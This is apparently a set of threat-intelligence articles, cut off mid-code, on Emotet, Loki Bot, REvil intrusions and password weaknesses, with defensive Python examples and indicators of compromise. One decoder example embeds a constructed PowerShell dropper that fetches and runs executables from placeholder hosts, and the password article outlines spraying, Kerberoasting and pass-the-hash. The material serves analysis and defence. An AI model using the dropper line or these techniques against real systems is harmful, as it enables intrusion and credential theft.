Opportunistic attacks are more than a nuisance

Some attacks are less sophisticated than others but still require lengthy and cumbersome responses. For instance, DarkLab is aware of a retailer operating in Hong Kong that was recently infected, likely in an automated fashion, by a self-spreading cryptominer. The malware exploited an exposed RDP server but was quickly detected by the victim’s security systems. Nonetheless, time and resources had to be spent on a thorough audit to ascertain the extent of the intrusion.

Similarly, data breaches can expose large amounts of customer data and pose a significant threat despite the perceived lack of attacker sophistication. In September, a threat actor on a popular hacking forum released almost 3 million customer records from an online hospitality company with operations in Hong Kong, Singapore and Malaysia.[1] Although the technical details of the breach are unclear, similar incidents often involve relatively unsophisticated techniques like SQL injection and exploitation of known vulnerabilities.

A thorough review of your online footprint and implementation of basic cyber security hygiene can help prevent such opportunistic attacks.

Conclusion and mitigation

The COVID-19 pandemic affecting the globe has led to an uptick in cybercrime across all sectors. However, the ongoing sales and the coming Christmas season are likely to see retailers particularly targeted, as health restrictions force customers to rely on e-commerce platforms for purchases of all kinds.

With the holiday season in full swing, the volume of online purchases is likely to be at an all-time high. While there are clear opportunities for retailers to profit from a digital-focused business model, threat actors are also looking to exploit the techniques described above for their own purposes.

Based on DarkLab’s experience helping retail clients respond to network intrusions and uplift their security posture, we recommend that organisations:

  • Enforce multi-factor authentication on all remote access services, including VPN, RDP and cloud environments.
  • Maintain ongoing visibility of all external-facing assets, and conduct regular vulnerability scans of external IP addresses.
  • Ensure mail filtering is in place to block inbound email that fails SPF, DKIM or DMARC checks.
  • Conduct regular security reviews of third-party code running on sensitive pages such as checkout pages.
  • Enforce a Content Security Policy (CSP) and regularly review which domains your pages are allowed to load resources from and send data to. This can help prevent Magecart skimmers from loading on, or exfiltrating customer data from, your site.
  • Consider adopting compliance as code so that breaches of pre-established security baselines are automatically detected and stopped.
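As an added example of the two checkout-page recommendations above, the following Python inventories the script sources on a checkout page and emits a CSP that pins the reviewed ones. It is not tooling from this article: the checkout HTML, the payment provider host js.payments-provider.example and the look-alike host cdn-stat1c.example are constructed for the example.

```python
"""Inventory of script sources on a checkout page, and the CSP that pins them.

Added example, not from the original article. The HTML is a constructed
checkout page; the allow-listed payment-provider host and the look-alike
skimmer host are made up.
"""
import base64
import hashlib
from html.parser import HTMLParser
from typing import Dict, List, Set
from urllib.parse import urlparse


class ScriptInventory(HTMLParser):
    """Collects external script URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external: List[str] = []
        self.inline: List[str] = []
        self._in_inline = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._buf, self._in_inline = [], False


def origin(url: str) -> str:
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}" if p.netloc else "'self'"


def review(html: str, allowed_hosts: Set[str]) -> Dict[str, List[str]]:
    """What a periodic third-party code review should report: every script
    origin, the ones nobody approved, and the inline scripts to eyeball."""
    inv = ScriptInventory()
    inv.feed(html)
    origins = {origin(u) for u in inv.external}
    unexpected = sorted(o for o in origins
                        if o != "'self'" and urlparse(o).netloc not in allowed_hosts)
    return {"origins": sorted(origins), "unexpected": unexpected, "inline": inv.inline}


def csp_sha256(script_body: str) -> str:
    """CSP hash source for an inline script: base64(sha256(exact body))."""
    digest = hashlib.sha256(script_body.encode("utf-8")).digest()
    return "'sha256-" + base64.b64encode(digest).decode() + "'"


def build_csp(html: str, allowed_hosts: Set[str], report_uri: str) -> str:
    """script-src pins the reviewed hosts plus hashes of the reviewed inline
    scripts (no 'unsafe-inline'); connect-src and form-action stop an injected
    skimmer from posting card data to a host of the attacker's choosing."""
    inv = ScriptInventory()
    inv.feed(html)
    hashes = " ".join(csp_sha256(s) for s in inv.inline)
    hosts = " ".join(sorted("https://" + h for h in allowed_hosts))
    policy = (f"default-src 'self'; script-src 'self' {hosts} {hashes}; "
              f"connect-src 'self' {hosts}; form-action 'self'; "
              f"frame-ancestors 'none'; report-uri {report_uri}")
    return " ".join(policy.split())


# Constructed checkout page: one approved provider, one look-alike CDN host
# of the kind a Magecart injection would add, and one inline config script.
CHECKOUT_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://js.payments-provider.example/v3/checkout.js"></script>
<script src="https://cdn-stat1c.example/jquery.min.js"></script>
<script>window.__shop = {currency: "HKD"};</script>
</head><body><form action="/pay"></form></body></html>"""
ALLOWED = {"js.payments-provider.example"}

if __name__ == "__main__":
    print(review(CHECKOUT_HTML, ALLOWED))
    print(build_csp(CHECKOUT_HTML, ALLOWED, "/csp-report"))
```

Run this against the live checkout page on a schedule and diff the inventory: a new origin or a changed inline hash is exactly what a Magecart injection looks like. Deploy the generated policy as Content-Security-Policy-Report-Only first and review the reports before switching to enforcement, since a hash changes whenever the inline script does.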

Researching Emotet in Hong Kong

How spam campaigns can threaten regional transport hubs

Emotet is among the most widespread cybercriminal campaigns to date. Originally developed as a banking trojan to steal victims’ banking credentials, it eventually evolved into a vehicle for spreading third-party malware via large spam campaigns. Emotet’s developers have been collaborating for months with those of TrickBot and Qakbot to deliver ransomware, which means that an Emotet infection would likely lead to widespread system unavailability.

The most recent wave of Emotet emerged in July, and in September it was reportedly sending large volumes of spam to Japan and New Zealand, among other countries.

DarkLab researchers found evidence that between August and September Emotet also targeted organisations in Hong Kong, a region not previously reported to be affected by this threat.

According to phishing emails uploaded to a popular malware repository, organisations in the retail, transport, and telecommunications sectors were among Emotet’s targets, although more companies are likely to have received their malicious emails.

Among the targets identified, the presence of Hong Kong’s main airport is particularly worrying. The organisation was very likely not compromised, or it would not have uploaded the phishing email to a malware repository, but as Emotet often leads to ransomware, a successful infection would likely have had a serious impact on one of the largest airports in Asia Pacific.

Figure 1 – screenshot of Emotet phishing email to a Hong Kong victim

Attack chain analysis

DarkLab analysts observed that the emails were sent by Emotet’s Epoch 2 botnet, abusing or spoofing previously compromised organisations in other countries. The phishing emails carry MS Word attachments with relatively generic filenames such as invoice.doc and MJ-1759 report.doc. Upon opening the document, the user is enticed to click the Enable Content button, a standard technique to activate malicious macros.

Figure 2 – screenshot of MJ-1759 report.doc (MD5:e1b8b7b710a639b0697a5f3b5e6a00bb)

The heavily obfuscated macros then launch a base64-encoded PowerShell command in memory, which downloads an executable from one of seven hardcoded URLs. Using multiple dropper sites ensures successful delivery even if one or more of them is taken down.

Figure 3 – decoded and partially deobfuscated powershell script reveals the dropper URLs (highlighted)
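Decoding the encoded PowerShell stage, as an added Python example rather than the script in Figure 3: -EncodedCommand payloads are base64 over UTF-16LE text, so the decoder below reverses that and then extracts the dropper URLs from the delimited-string pattern such macros typically use. The sample one-liner, its example.invalid hostnames and the two obfuscation tricks it strips are constructed for the example and are not the content of the Emotet sample.

```python
"""Decode a PowerShell -EncodedCommand payload and pull out the dropper URLs.

Added example, not the script in Figure 3. SAMPLE_SCRIPT is a constructed
dropper one-liner with example.invalid hostnames.
"""
import base64
import re
from typing import List

# Stop at whitespace, quotes, backticks and the delimiters droppers join URLs with.
URL_RE = re.compile(r"https?://[^\s'\"`;,)@*|]+", re.I)


def encode_powershell(script: str) -> str:
    """What `powershell -EncodedCommand` expects: base64 over UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Reverse of encode_powershell; tolerates stripped padding and falls back
    to UTF-8 for blobs that a macro base64'd from a plain string."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    try:
        return raw.decode("utf-16le")
    except UnicodeDecodeError:
        return raw.decode("utf-8", errors="replace")


def strip_obfuscation(script: str) -> str:
    """Two cheap tricks these macros use: backtick escapes inside identifiers
    (Down`loadFile) and string splitting with '+' ('htt'+'p://')."""
    return script.replace("`", "").replace("'+'", "").replace('"+"', "")


def extract_urls(script: str) -> List[str]:
    """Unique URLs in order of appearance. Emotet-style droppers keep the
    candidates in one string split on '@' (or '*', '|') and try each in turn."""
    seen, out = set(), []
    for url in URL_RE.findall(script):
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


def analyse(blob: str) -> List[str]:
    return extract_urls(strip_obfuscation(decode_powershell(blob)))


# Constructed sample: three '@'-joined download sites, one backtick escape.
SAMPLE_SCRIPT = (
    "$u='http://site-one.example.invalid/wp-content/a.exe@"
    "http://site-two.example.invalid/img/b.exe@"
    "https://site-three.example.invalid/x/c.exe'.Split('@');"
    "foreach($k in $u){try{(New-Object Net.WebClient).Down`loadFile($k,$env:TEMP+'\\a.exe');break}catch{}}"
)
SAMPLE_ENCODED = encode_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(SAMPLE_ENCODED[:40] + "...")
    for url in analyse(SAMPLE_ENCODED):
        print(url)
```

The UTF-16LE detail matters in practice: a decoder that assumes UTF-8 sees every other byte as a NUL and regexes for URLs silently match nothing.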

This first-stage payload, whose filename varies between samples, is by default saved under %TEMP%, %APPDATA% or the user’s profile folder. When run, it gains persistence by copying itself to the system folder under a different name and by modifying registry entries so that the process is started every time the endpoint boots. The new executable in the system folder, here named kbdrost.exe, is the actual Emotet payload, and it reaches out to a command and control server via an HTTP POST request.

Figure 4 – Emotet’s connection to remote C2 IP following successful infection

Based on previously observed behaviour, Emotet will eventually drop the TrickBot or Qakbot trojans, which then deliver the Ryuk or ProLock ransomware respectively.

Emotet’s large spam campaigns and relatively sophisticated delivery mechanisms are likely to keep posing a threat to companies in Asia Pacific for the foreseeable future. DarkLab’s discovery of Emotet targeting Hong Kong organisations shows that companies in the region should maintain awareness of global threat trends to ensure effective network defences and a proactive approach to cyber security.

Indicators of Compromise

The following IOCs relate to the samples analysed, including the hardcoded C2 IP addresses. However, Emotet’s attack infrastructure changes rapidly, so we suggest readers refer to Cryptolaemus’ daily IOC lists for an updated and comprehensive overview of Emotet’s infrastructure.

Filename | SHA-256 hash
MJ-1759 report.doc | 5a378819ab9e17bc93ed9c3d01b31f2b1ff6c39cb3cbaff66933fe096a527450
Executable dropper URLs

C2 IPs

A tale of two hacks

A case study in structured intelligence analysis

In recent weeks DarkLab helped a large international company conduct a threat hunting exercise in their infrastructure following a network breach.

The initial investigations revealed that threat actors infiltrated the network using legitimate and likely stolen credentials on a Citrix server hosted in a European subsidiary of our client. From there, however, the DarkLab team discovered two sets of activities. One led to the exfiltration of a large amount of data, the other to the deployment of the REvil ransomware, also known as Sodinokibi. We previously reported on how ransomware operators are increasingly stealing data from their victims to threaten its release if their ransom demands are not met. It therefore seemed possible that the two sets of malicious activities were carried out by the same threat actor.

Indeed, the initial entry point was the same, and the stolen data was uploaded to Mega, a popular data hosting site previously used by REvil operators. However, some other aspects of the malicious actions did not add up. For instance, data was exfiltrated weeks after the ransomware was deployed, which would have been inconsistent with previously observed tactics, techniques and procedures (TTPs) of ransomware operators. Also, the activities that led to ransomware deployment and those that ended up stealing data exploited commonly used but different toolsets. While in one incident Cobalt Strike was used as the attacking tool on day one, the other set of activities involved PsExec the day after. Since Cobalt Strike has PsExec built in, we started doubting whether the two incidents were carried out by the same hacker.

Assessing pieces of conflicting evidence can be messy and potentially lead to the wrong conclusion. In order to analyse existing evidence in an unbiased and objective manner, DarkLab analysts resolved to employ a traditional intelligence analysis technique used by intelligence professionals since the 1960s. Despite its age, the Analysis of Competing Hypotheses (ACH) remains a useful framework to answer difficult questions in a way that removes analysts’ potential biases or misconceptions.

Our analysts created a table like the one below, where each piece of evidence is given a credibility and a relevance score before its consistency with each hypothesis is evaluated. The hypothesis with the highest score is considered the most likely.

In our case we considered the following hypotheses:

H1: Incident 1 and 2 were carried out by the same attacker

H2: Incident 1 and 2 were carried out by two different attackers

H3: Incident 1 and 2 were carried out by more than two attackers

Fig 1 – ACH table

By rating the evidence collected as consistent (C), not applicable (N), or inconsistent (I) with each of the hypotheses, a final score is calculated. H2 scored the highest, indicating it was clearly the most likely hypothesis. This suggested that different threat actors were indeed separately involved in the ransomware deployment and the data exfiltration.
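The scoring procedure above, written out as an added example (this is not DarkLab's table or tooling). The evidence items, their credibility and relevance scores and the C/N/I ratings are constructed from the narrative, and the weighting formula (credibility times relevance, with C adding and I subtracting) is an assumption, since the page does not show its own.

```python
"""Analysis of Competing Hypotheses (ACH) scoring.

Added example, not DarkLab's table or tooling. Evidence, scores and C/N/I
ratings are constructed from the narrative; the weighting formula is assumed.
"""
from dataclasses import dataclass

HYPOTHESES = {
    "H1": "Incidents 1 and 2 were carried out by the same attacker",
    "H2": "Incidents 1 and 2 were carried out by two different attackers",
    "H3": "Incidents 1 and 2 were carried out by more than two attackers",
}

RATING_SIGN = {"C": 1, "I": -1, "N": 0}   # consistent / inconsistent / not applicable


@dataclass
class Evidence:
    description: str
    credibility: int   # 1 (low) to 5 (high): how much the observation is trusted
    relevance: int     # 1 (low) to 5 (high): how diagnostic it is for the question
    ratings: dict      # hypothesis id -> "C", "I" or "N"

    @property
    def weight(self) -> int:
        # Assumed weighting: a credible, highly relevant item moves the score most.
        return self.credibility * self.relevance


# Constructed evidence items paraphrasing the observations in the text above.
EVIDENCE = [
    Evidence("Same initial entry point: stolen credentials on the Citrix server", 5, 3,
             {"H1": "C", "H2": "N", "H3": "N"}),
    Evidence("Stolen data uploaded to Mega, previously used by REvil operators", 4, 2,
             {"H1": "C", "H2": "N", "H3": "N"}),
    Evidence("Data exfiltrated weeks after the ransomware was deployed", 5, 5,
             {"H1": "I", "H2": "C", "H3": "C"}),
    Evidence("Different toolsets: Cobalt Strike on day one, PsExec the day after", 4, 4,
             {"H1": "I", "H2": "C", "H3": "C"}),
    Evidence("Only two distinct sets of activity were identified", 4, 4,
             {"H1": "C", "H2": "C", "H3": "I"}),
]


def score(evidence, hypotheses=HYPOTHESES):
    """Weighted score per hypothesis: sum of sign(rating) * weight over all evidence."""
    totals = {h: 0 for h in hypotheses}
    for item in evidence:
        for h in hypotheses:
            totals[h] += RATING_SIGN[item.ratings.get(h, "N")] * item.weight
    return totals


def inconsistencies(evidence, hypotheses=HYPOTHESES):
    """Heuer's original ACH test: count the evidence each hypothesis cannot explain."""
    return {h: sum(1 for item in evidence if item.ratings.get(h) == "I")
            for h in hypotheses}


def most_likely(evidence, hypotheses=HYPOTHESES):
    """Hypothesis with the highest weighted score."""
    totals = score(evidence, hypotheses)
    return max(totals, key=totals.get)


def render_table(evidence, hypotheses=HYPOTHESES):
    """Plain-text version of the ACH matrix, for the analyst's write-up."""
    header = f"{'Evidence':<70} {'Cred':>4} {'Rel':>3} " + " ".join(f"{h:>3}" for h in hypotheses)
    rows = [header]
    for item in evidence:
        rows.append(f"{item.description:<70} {item.credibility:>4} {item.relevance:>3} "
                    + " ".join(f"{item.ratings.get(h, 'N'):>3}" for h in hypotheses))
    totals = score(evidence, hypotheses)
    rows.append(f"{'Score':<70} {'':>4} {'':>3} " + " ".join(f"{totals[h]:>3}" for h in hypotheses))
    return "\n".join(rows)


if __name__ == "__main__":
    print(render_table(EVIDENCE))
    best = most_likely(EVIDENCE)
    print("Most likely:", best, "-", HYPOTHESES[best])
```

With these constructed ratings H2 wins on both the weighted score and Heuer's inconsistency count; the value of the matrix is that changing one rating shows immediately which single observation the conclusion hinges on.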

In this way, we were able to use a fact-based, objective analysis of the available intelligence to our advantage in a live threat hunting exercise. In particular, our threat hunting team was able to treat the incidents as separate, with significant implications for their efforts in detecting and mitigating the breaches.

Further details on the incidents

Our forensic investigation identified how the ransomware attack lasted a total of five days, while the threat actor that stole the data was able to remain undetected in the network for almost six weeks. In both cases, the number of hosts compromised was significant and threat actors were able to move across different countries’ networks without being detected.

The REvil operator used the legitimate remote access solution AnyDesk as a backdoor, and eventually deployed the ransomware to over 1000 servers and workstations in Hong Kong and the UK. Ironically, the ransomware interfered with the callbacks the second attacker had already established on 10 machines. All their established call-back connections on the compromised servers were gone after the ransomware attack. They were therefore forced to restart from the initially compromised Citrix server in the UK. From there, they used Cobalt Strike for lateral movement and privilege escalation on multiple accounts in Hong Kong, the US, and India. This second attacker collected hundreds of gigabytes of data from different servers, staged them internally, compressed them, and eventually uploaded them to a Mega cloud server.


The presence of two separate attackers within the network of a large conglomerate indicates the significant challenges that large organisations with tens of thousands of endpoints can face. Deploying standard policies on such a large estate can be challenging, but we strongly recommend that organisations:

  • Enable Multi-Factor Authentication (MFA) for all remote access
  • Enforce strong password policies, proper Active Directory-based mechanisms, or a managed password solution to protect Domain Administrator accounts
  • Tighten cloud file storage usage; some solutions offer built-in micro-segmentation that can help prevent attackers from accessing your data
  • Consider employing Managed Detection and Response services to automatically and proactively mitigate threats in a 24/7 manner

Indicators of Compromise


File name | Hash | Description
payload.txt | f5dd8644b011a6ecaf405ee9bc5c6852 | Cobalt Strike implant callback
beac.exe | 500286eaf9eb11b34eb413bb0df5543b | Cobalt Strike implant callback

Indicator | Description
82.31.145[.]121 | Infiltration IP
94.7.101[.]89 | Infiltration IP
158.174.247[.]194 | Infiltration IP
212.80.217[.]174 | Call back IP
51.83.165[.]21 | Call back IP
fairyschool[.]art | C2 domain for baec.exe

You Shall Not Pass(words)

A red teamer’s perspective on what is wrong with passwords, and how to make it right

“Your passwords are weak” is one of the most common observations that we find ourselves making in our red teaming work. It often surprises organisations: our clients’ passwords meet their formal complexity requirements. However, a password compliant with password policies is not necessarily a strong password. Password policies are usually designed around the compliance features available in Windows. Some of these, like the 20-year-old Windows Password Complexity rule, are quite outdated.

In the course of one red team engagement our offensive security professionals can encounter hundreds of weak passwords. Weak passwords allow hackers to infiltrate your network and to move laterally in your environment. In this article, we draw from our offensive security experience to illustrate common misconceptions about passwords, and what companies should do to enforce stronger ones.

Beyond a lengthy and repetitive approach

In 2017 the NIST Special Publication SP800-63-3 introduced an interesting concept, that complexity requirements and expiry dates are not necessary, and not effective, for memorised secrets like passwords.

This was published at a time where most security control guidelines still required corporate users to use complex passwords and change them periodically, sometimes as often as every month. Instead, NIST encouraged a new approach including using multi-factor authentication solutions wherever possible and checking passwords against dictionary lists, among others.

Microsoft has since implemented some of these suggestions within the Windows platform. From our experience, however, most organisations in Hong Kong and Asia Pacific still lack a full understanding of some of these technologies to apply them effectively. The first misconception is that short passwords and PINs are weak. This is an over-simplification of how security works. The strength of a password should be assessed alongside its potential exploitation techniques.

Length does not always matter

One example is the use of Windows PINs compared to Windows domain passwords. Their requirements should be different because their potential attack vectors are as well. While hashes of Windows passwords can be downloaded and bruteforced offline, PINs cannot. Also, PINs have a much smaller attack surface compared to a domain password.

Windows domain passwords are one of the most common ways to gain access to a target network and its resources in a Windows environment. Domain passwords must be complex because attackers can abuse each one of them at different points of a corporate network. For instance, during red team engagements we can typically conduct password spraying with a standard set of user passwords within the local network and sometimes against remote applications, such as Outlook Web Access. We can also leverage Windows functionalities to obtain password hashes, via Kerberoasting or LLMNR poisoning for instance, which we can then crack offline. Strong and complex passwords would be much harder, if not impossible, to crack and would be harder to guess in a password spraying attack.

On the contrary, a Windows PIN can only be used on a single Windows machine, and an attacker can be further slowed down by introducing a delay between failed attempts.

Does a long, complex PIN make sense in this case? A 12-character, complex Windows PIN which can only be entered (and therefore attempted by the attacker) on a physical machine is unnecessary. From a red teamer point of view, a 6- to 8-character PIN is sufficient for a Windows PIN environment.

While it takes only a few hours to bruteforce a hashed 8-character Windows password offline, it takes much longer to test potential PINs on premises on a Windows machine. Also, bruteforcing a PIN is not practical because the TPM anti-hammering protection locks PIN attempts for 24 hours after 32 wrong attempts. This is summarised in the graph below.

Therefore a Windows PIN, or any PIN tied to hardware devices like iOS devices:

  • Does not require length and complexity
  • Does not require frequent expiry dates

Bypassing passwords

There are authentication solutions other than passwords and PINs. Some organisations use smartcards, which seem like an elegant solution. In effect, the “PIN” that users enter unlocks the content of the smartcard, which can subsequently be used to connect to domain resources.

The problem often lies with the implementation of these solutions. In most situations, the smartcard stores an NTLM hash that is unlocked by the user’s PIN. This NTLM hash is randomly generated and complex enough for it not to be cracked into cleartext format. However, the system never changes this NTLM hash, which can therefore be used directly to authenticate to Windows domain resources via pass-the-hash. If this NTLM hash is compromised, it would allow attackers persistent access for a long time.

For us red teamers, one way to get these hashes is via the Net-NTLMv1 hashes that some organisations still use. Net-NTLMv1 can be directly converted into NTLM, which can then be used for pass-the-hash activities. This is because Net-NTLMv1 relies on three separate DES encryptions, which can be cracked separately back into NTLM format due to the weakness of the encryption algorithm.

Another solution to move beyond password authentication is Windows Hello for Business. This Microsoft solution would supposedly allow businesses to move into a password-less environment. In a nutshell, a Windows Hello for Business PIN or biometric authentication unlocks the credentials (stored as certificates or keys) within the PC. We have yet to see widespread adoption of Windows Hello for Business though.

Trust but verify

For those of us that must still rely on Windows domain passwords, an important addition would be to introduce a password checking process. Most organisations do this via the complexity requirements built into Windows.

As our reader may have guessed by now, complexity requirements are not enough. Consider the following “strong” passwords that meet Windows complexity policies:

  • P@ssw0rd
  • P@$$w0rd
  • Username!July
  • July!2020

From the perspective of an IT security controls or compliance person, these are good passwords that meet policy requirements. From a red teamer’s perspective, these are all very weak passwords.

From our experience, at least 70% of all passwords within an organisation are similarly weak passwords that nonetheless comply with password policies.

The problem could be addressed by increasing the complexity required by password policies. However, this would likely increase users’ frustration while not necessarily making life harder for an attacker.

To ensure that systems are secured with stronger passwords, organisations need a solution that takes real world scenarios into consideration. Consider a password audit exercise, which checks your users’ new and existing passwords against a list of:

  • Known passwords from leaked data breaches
  • Most commonly used passwords
  • Passwords that contain references to the organisation, username, etc.
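An added example of such an audit (not DarkLab's audit tool) that runs the four “strong” passwords listed earlier through a Windows-style complexity rule and then through the three blacklist checks above. The breach list, base-word list, user name (jsmith) and organisation name (Acme Shipping) are constructed stand-ins; a real audit would compare hashes against a breach corpus rather than plain text.

```python
"""Password audit: policy-compliant yet weak.

Added example, not DarkLab's audit tool. Blacklists, user name and
organisation name are constructed stand-ins for the real lists.
"""
import re

# Constructed, tiny stand-ins for real blacklists.
BREACHED = {"P@ssw0rd", "123456", "qwerty", "Welcome1"}
COMMON_BASE_WORDS = {"password", "welcome", "letmein", "admin", "qwerty"}
MONTHS = ("january", "february", "march", "april", "may", "june", "july",
          "august", "september", "october", "november", "december")
MONTH_RE = re.compile("|".join(MONTHS))
YEAR_RE = re.compile(r"(19|20)\d{2}")

# Common substitutions that turn a dictionary word into a "complex" password.
LEET = str.maketrans({"@": "a", "$": "s", "0": "o", "1": "i", "3": "e",
                      "4": "a", "5": "s", "7": "t", "!": "i", "|": "l"})


def normalise(text: str) -> str:
    """Lower-case, undo leet substitutions and keep letters only: P@$$w0rd -> password."""
    return re.sub(r"[^a-z]", "", text.lower().translate(LEET))


def meets_complexity_policy(pw: str, min_length: int = 8) -> bool:
    """Windows-style complexity rule: three of four character classes plus a
    minimum length (the account-name check of the real policy is left out)."""
    classes = [any(c.isupper() for c in pw), any(c.islower() for c in pw),
               any(c.isdigit() for c in pw), any(not c.isalnum() for c in pw)]
    return len(pw) >= min_length and sum(classes) >= 3


def audit(pw: str, username: str, organisation: str) -> list:
    """Return the sorted list of audit findings for one password (empty = passed)."""
    findings = set()
    norm = normalise(pw)
    if pw in BREACHED:                                   # known from leaked breaches
        findings.add("breached")
    if any(word in norm for word in COMMON_BASE_WORDS):  # most commonly used words
        findings.add("dictionary-word")
    user = normalise(username)
    if user and user in norm:                            # references the user name
        findings.add("username")
    org_tokens = [normalise(t) for t in organisation.split()]
    if any(len(t) >= 3 and t in norm for t in org_tokens):   # references the organisation
        findings.add("organisation")
    if MONTH_RE.search(pw.lower()):                      # month names are a favourite filler
        findings.add("month")
    if YEAR_RE.search(pw):                               # so are years
        findings.add("year")
    return sorted(findings)


def audit_report(passwords, username, organisation):
    """Map each password to its policy result and its audit findings."""
    return {pw: {"policy_ok": meets_complexity_policy(pw),
                 "findings": audit(pw, username, organisation)}
            for pw in passwords}


if __name__ == "__main__":
    samples = ["P@ssw0rd", "P@$$w0rd", "Acme!July", "July!2020", "Jsmith2020!",
               "correct-horse-battery-staple"]
    for pw, result in audit_report(samples, "jsmith", "Acme Shipping").items():
        print(f"{pw:<30} policy_ok={result['policy_ok']!s:<5} findings={result['findings']}")
```

The run shows the mismatch the text describes: every policy-compliant sample is flagged by the audit, while the long passphrase passes the audit but fails the character-class rule.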

Fortunately for Windows users, such functionality is provided with an Azure AD subscription.

For companies that do not use Azure AD, DarkLab also offers a solution with similar functionalities that relies on password blacklists from our Threat Intelligence practice.

Whatever solutions you choose, remember the key concepts we went through:

  • Longer is not always better
  • PINs are better than passwords
  • Passwordless solutions must be correctly implemented
  • Perform a password audit by checking your passwords against a blacklist, without adding unnecessary complexity!

Phishing Vessels

Loki Bot campaign targets maritime industry

DarkLab intelligence analysts detected a Loki Bot phishing campaign targeting the maritime and engineering sectors in Europe, Asia and the US from spoofed email addresses of legitimate organisations in Asia.

Figure 1 – Countries of origin of phishing recipients (blue) and legitimate organisations’ spoofed addresses (red)

Recipients of phishing emails – hard to see in the map above – were also located in Singapore.

The earliest phishing email detected dates back to October 2019. However, our previous research indicates that this threat actor has been using maritime themes in their phishing campaigns since at least 2018, and is linked to other malware families including Pony.

The 2019 email was sent from a likely compromised subdomain of an Indonesian company and contained a malicious archive (.rar) attachment purportedly pertaining to a purchase order, a common theme of spam emails.

Since then, the actor behind the campaign refocused their phishing lures by spoofing emails of legitimate organisations linked to the maritime industry, and by referring to vessels and other naval themes in their emails.

Figure 2 – Example of phishing email spoofing a Singapore-based shipping company

Figure 3 – Example of phishing email sent to a Switzerland-based maritime consultancy

Some phishing emails showed a good knowledge of the shipping industry, including believable details of existing ships and port locations.

Figure 4 – Example of phishing email sent to a Japanese shipping company

Figure 4 – Example of phishing email sent to an Italian engineering contractor, purporting to be from a Chinese port authority

For instance, both vessels mentioned in the email above, Glovis Crown and Glovis Splendor, are 200m long cargo ships registered in the Marshall Islands. It remains unclear how criminals managed to obtain such details, although it seems likely that they derive from previously hijacked communications of potentially unrelated victims.

This second wave of phishing emails has been active between February and late June 2020, suggesting the campaign is likely still active.

Phishing emails switched to a malicious Microsoft Excel (.xlsx) attachment containing an exploit for CVE-2017-11882. This vulnerability in Microsoft Equation Editor lets attackers run remote code on a vulnerable machine when the victim opens a document. The exploit has been actively used by multiple cybercriminal groups due to the level of access it grants to the victim machine and the lack of user interaction needed.

Figure 5 – Screenshot of malicious xlsx attachment to email in Figure 4 [MD5: e7bb1284bf0e723b47435b0f70504b3f]

The malicious documents are downloaders for Loki Bot, an information stealer first seen in 2015. The malicious payloads observed, and additional ones found by pivoting on the attack infrastructure, are downloaded from duckdns.org subdomains likely created with domain generation algorithms (DGA).

The payload, Loki Bot, can steal credentials from browsers and email clients, among other programs, and has keylogging capabilities. The malware also sends identifying information about the victim’s hosts to a C2 to inform threat actors of the successful infection.

The current Loki Bot campaign highlights the ongoing threat of commodity malware and widespread phishing to organisations in the maritime and engineering sectors. Although the campaign exploits well-known threat vectors, the lack of widespread adoption of anti-spoofing technologies like SPF and DMARC, or their incorrect implementation, means that criminals can continue sending credible phishing emails apparently from legitimate domains.
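An added example (not DarkLab tooling) of what “incorrect implementation” looks like in practice: a checker that grades an SPF and a DMARC record and shows a weak pair beside a corrected one. The records and the domain example.com are constructed; in a real check they would be fetched as the TXT records of the domain and of _dmarc.<domain>, which is left out so the code runs offline.

```python
"""Grade SPF and DMARC records for the spoofing gaps described above.

Added example, not DarkLab tooling. The records are constructed; a real
check fetches them from DNS (TXT of <domain> and _dmarc.<domain>).
"""
import re

# Constructed records for a fictitious shipping company, example.com.
WEAK_SPF = "v=spf1 include:_spf.example.net ~all"
WEAK_DMARC = "v=DMARC1; p=none; rua=mailto:dmarc@example.com"
STRONG_SPF = "v=spf1 ip4:203.0.113.0/24 include:_spf.example.net -all"
STRONG_DMARC = "v=DMARC1; p=reject; sp=reject; pct=100; rua=mailto:dmarc@example.com"

# SPF terms whose evaluation costs a DNS lookup (RFC 7208 caps these at 10).
LOOKUP_TERM = re.compile(r"^[+\-~?]?(include:|a$|a[:/]|mx$|mx[:/]|ptr|exists:|redirect=)", re.I)


def assess_spf(record):
    """Return a list of (severity, finding) for an SPF TXT record (None = no record)."""
    if not record or not record.lower().startswith("v=spf1"):
        return [("high", "no SPF record: any host may claim to send for the domain")]
    terms = record.split()[1:]
    all_term = next((t for t in terms if t.lower().lstrip("+-~?") == "all"), None)
    findings = []
    if all_term is None:
        findings.append(("high", "no 'all' mechanism: unlisted senders get a neutral result"))
    elif all_term in ("all", "+all"):
        findings.append(("high", "'+all' authorises every sender on the internet"))
    elif all_term == "?all":
        findings.append(("high", "'?all' is neutral, equivalent to no policy"))
    elif all_term == "~all":
        findings.append(("medium", "'~all' softfail: many receivers still deliver spoofed mail"))
    # '-all' is the strict setting and raises nothing.
    if sum(1 for t in terms if LOOKUP_TERM.match(t)) > 10:
        findings.append(("high", "more than 10 DNS lookups: receivers return permerror"))
    return findings


def parse_dmarc(record):
    """Split 'v=DMARC1; p=reject; ...' into a lower-cased tag dictionary."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record):
    """Return a list of (severity, finding) for a DMARC TXT record (None = no record)."""
    if not record or not record.upper().startswith("V=DMARC1"):
        return [("high", "no DMARC record: SPF/DKIM results are never enforced on the From: header")]
    tags = parse_dmarc(record)
    findings = []
    policy = tags.get("p", "").lower()
    if policy == "none":
        findings.append(("high", "p=none only reports; spoofed mail is still delivered"))
    elif policy == "quarantine":
        findings.append(("low", "p=quarantine: spoofed mail lands in junk rather than being rejected"))
    elif policy != "reject":
        findings.append(("high", "missing or invalid p= tag"))
    if tags.get("pct", "100") != "100":
        findings.append(("medium", "pct<100: policy applied to only part of the traffic"))
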